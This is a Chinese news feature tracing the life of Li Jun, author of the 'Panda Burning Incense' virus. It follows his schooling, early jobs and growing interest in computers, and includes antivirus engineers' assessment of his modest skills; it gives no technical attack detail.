　　1989年9月，李俊进入了娲石子弟小学，此后升入娲石子弟中学，李明也是毕业于这两个学校。　　小学、初中阶段的李俊一直很温和。李明回忆，1997年，他上小学六年级，跟同学打架处于下风，正好遇到当时上初二的哥哥李俊。“那时，他就有1米75，个子非常高，但是他把我们两个拉开了，然后叫我回去。”李明说，李俊劝他说吃点亏没什么。　　在李明的印象中，小学和初中阶段的李俊表现还不错，就是有点“调皮”，不怎么认真听老师讲课。李俊偏科现象十分严重，文科弱、理科强，文科里只有英语成绩一直不错。　　1998年7月，李俊中考结束，成绩并不理想，分数只够上新洲区刘集中学，这是一所升学率不高的镇级高中。　　张淑桦说，当时，他们认为如果上刘集中学将来考上大学的可能性很小，而且家里无力负担两个孩子上高中。　　“当时，厂里技校又有人上门来做工作，说上厂里技校将来能直接安排工作。”张淑桦说，他们最后决定让李俊上中专。　　1998年9月，李俊进入娲石公司培训中心开始中专阶段学习，专业是水泥工艺。　　李明回忆，学校开学后很快发了教材，全部是水泥专业的。李俊把这些书背回家后就哭了。李俊没有向李明解释，不过他明白哥哥的心思，李俊还是希望上高中、上大学。李明说，李俊上中专的时候流行交笔友，最初认识的时候，都要填写固定格式的自我介绍。“其中有一栏是‘最遗憾的事情’，哥哥当时填的就是‘没有上大学’。”李明说。　　后来，当李明考上大学准备去重庆时，李俊还特意到火车站去送弟弟，当时他也流泪了。

中专开始接触电脑

　　李俊的中专生涯在1999年发生了变化。　　由于娲石公司发展方向的调整，李俊全班的专业调整为机电一体化。“当时，培训中心是企业办学，学生都是娲石公司子弟，毕业以后为娲石公司工作，学生专业就会根据公司需要进行调整。”娲石技校副校长胡毅说。胡毅曾是李俊的物理和电工学教师，在他印象里，除了身高是全班第二外，李俊并没有什么特别。　　对于李俊的表现，胡毅用“中规中矩”来形容。胡毅说，李俊不算积极主动。上物理课的时候，李俊很少会主动发言，但如果被点到，他一般都能答对。胡毅回忆，李俊不太喜欢运动。当时，他在班上组织了一个排球队，但李俊不愿参加，也不参加篮球、足球之类的体育活动。　　据胡毅介绍，李俊最初接触电脑应该在中专阶段。中专二年级，学校开设了计算机一级课程，学习DOS、Windows等操作系统和Office办公软件的一些基本操作。　　“学生们总共学习了200个课时，包括理论和上机。”胡毅说，学校那时只有20多台电脑，上机的课时相对理论少一点，他当时并没有看出李俊对电脑的热情比别人高。　　不过，李明记得，李俊当时学习电脑比较用功，他打字的速度在班上最快。　　伴随着电脑课程的结束，李俊的中专生活也提前结束了。胡毅说，当时，娲石公司确立了新的发展方向，成立了武汉化工建材公司，制造塑钢门窗材料，需要从机电一体化专业选调4名学生。经过学习成绩评定、公司领导面试，2000年下半年，李俊和3名同学被派往武汉化工建材公司工作。这4名学生都是综合考查成绩最好的。

工作后迷上网络

　　2000年下半年，18岁左右的李俊早早地开始了工作生涯。这一年，网吧在武汉慢慢兴盛起来。　　李俊进入武汉化工建材公司后，并没有太多发展，收入也不高。张淑桦说，李俊当时的工资每月只有五六百元，刚够自己花销，偶尔还从家里要点钱，但不多。　　李明回忆，大约在2000年，阳逻也开始出现网吧，李俊是最早的一批常客，他经常在网上聊天、打游戏。李俊后来对李明讲，迷恋上网缘于一部关于网友的电视剧。　　李明说，风靡一时的网络爱情故事《第一次亲密接触》 ，李俊也很喜欢，他特意买了那本小说。　　后来，李俊上网有些成癖。张淑桦说，一次，李俊在外面上网彻夜未归，这被她理解为太不听话，让她非常生气。等李俊第二天回来，她就骂了李俊一顿，还动手打了他。　　不过，李俊对网络的热情并未减弱。李俊在2002年辞掉了武汉化工建材公司的工作，只身一人前往武汉市区打工。　　就这样，李俊成为武汉城区打工族的一员，他在离开前对弟弟说不想做自己不喜欢的事情。　　李俊初到武昌的工作是网吧管理员。李明说，印象中，李俊在此之前从未去过武汉城区，对城区也十分陌生。　　“哥哥后来跟我说，他特别感谢一个网友，这个网友住在武汉城区，在李俊初到城里打工时给了很多帮助，特别是提供了住的地方。”李明说。　　李俊的工作并不顺利，他在武昌干过网吧管理员，后来到电脑城装机，中间还替人开过车。　　网吧管理员的工作后来让李俊觉得很苦，工作起来“没有白天没有黑夜的”，还挣不了多少钱。　　张淑桦说，李俊当时的收入也不高，也就几百到一千元之间。2003年，李俊想买台电脑，但没钱，还是找父母借了3000多元买的。

曾经找工作遇阻

　　一直在武汉漂着的李俊，平常并不经常回家，家里人对他的工作也了解不多。不过，李明发现哥哥爱学习网络知识。　　今年1月初，李明从成都回到武汉住在李俊租住的出租屋里。他发现，哥哥的房间里满是计算机网络方面的书籍。2月初，警方从李俊家里拉走了那台花3000多元买的电脑，还拉走了满车的书。　　李明说，一年多以前，李俊曾写过一个让屏幕下雪的程序，传给他。当时，他觉得哥哥有一定编程能力，但并未觉得他很厉害。　　去年，李明的电脑中了“923”病毒，于是在网上向李俊求助，李俊在网上就帮弟弟搞定了病毒。李明这才觉得哥哥技术不错。　　2006年的一天，还在成都上学的李明在网上遇到李俊，李明问哥哥最近在忙什么。李俊说他最近到北京和广州去找工作，其中包括瑞星和金山等杀毒软件公司，但没有结果。　　李明说，李俊是一个自尊心非常强的人，两次求职碰壁肯定会伤害他的自尊心。李明猜测，求职碰壁的关键因素很可能是中专学历。　　2月9日，在看守所内，李俊编写了“熊猫烧香”病毒专杀工具（李俊版）。对此，瑞星公司的反病毒工程师们进行了分析，“写得很简陋，他搜索病毒的方法是，凡文件中有‘whboy’等他的签名的文件就是病毒，这办法太粗糙了。”　　“李俊的技术水平只能算中等。”瑞星的反病毒工程师史瑀称，熊猫烧香编写原理，采用了网上流传已久的一些技术手段，李俊原创的成分很少。　　史瑀说，时常会有一些自称技术高手的网友来瑞星自荐求职，公司会对这些高手进行技术考核，但通过面试和笔试的“高手”并不多。　　“以李俊的水平，他只能做病毒测试的工作，他不具备编写杀毒软件的水平。”史瑀说。　　金山公司毒霸市场部技术工程师李铁军同样认为李俊的技术水平一般。他认为，“熊猫烧香”病毒的蔓延和背后团队有关，李俊的技术并不是决定因素。